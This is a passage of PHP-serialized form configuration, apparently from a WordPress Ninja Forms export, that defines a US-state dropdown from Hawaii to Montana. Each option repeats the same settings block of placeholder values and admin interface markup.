Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:11;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Hawaii\";s:5:\"value\";s:2:\"HI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:12;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Idaho\";s:5:\"value\";s:2:\"ID\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:13;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Illinois\";s:5:\"value\";s:2:\"IL\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:14;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Indiana\";s:5:\"value\";s:2:\"IN\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:15;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:4:\"Iowa\";s:5:\"value\";s:2:\"IA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:16;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Kansas\";s:5:\"value\";s:2:\"KS\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:17;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Kentucky\";s:5:\"value\";s:2:\"KY\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:18;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Louisiana\";s:5:\"value\";s:2:\"LA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:19;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Maine\";s:5:\"value\";s:2:\"ME\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:20;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Maryland\";s:5:\"value\";s:2:\"MD\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:21;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Massachusetts\";s:5:\"value\";s:2:\"MA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:22;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Michigan\";s:5:\"value\";s:2:\"MI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:23;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Minnesota\";s:5:\"value\";s:2:\"MN\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:24;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:11:\"Mississippi\";s:5:\"value\";s:2:\"MS\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:25;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Missouri\";s:5:\"value\";s:2:\"MO\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:26;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Montana\";s:5:\"value\";s:2:\"MT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc 